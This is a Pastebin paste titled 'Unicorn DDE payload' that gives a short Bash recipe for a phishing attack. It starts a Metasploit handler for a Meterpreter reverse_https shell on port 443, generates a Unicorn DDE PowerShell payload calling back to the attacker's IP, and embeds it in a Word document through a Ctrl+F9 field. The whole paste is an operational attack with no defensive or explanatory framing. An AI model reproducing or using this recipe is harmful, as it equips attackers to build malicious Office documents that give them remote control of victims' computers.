Advertisement
illwill

Unicorn DDE payload

Oct 14th, 2017
219
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.55 KB | None | 0 0
  1. #Start Meterpreter reverse_tcp handler with IP:
  2. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
  3. msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"
  4.  
  5.  
  6.  
  7. # Generate Unicorn Payload:
  8. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
  9. python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
  10. leafpad powershell_attack.txt
  11.  
  12. open new word document , press ctrl+F9
  13. paste into contents of powershell_attack.txt and save
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement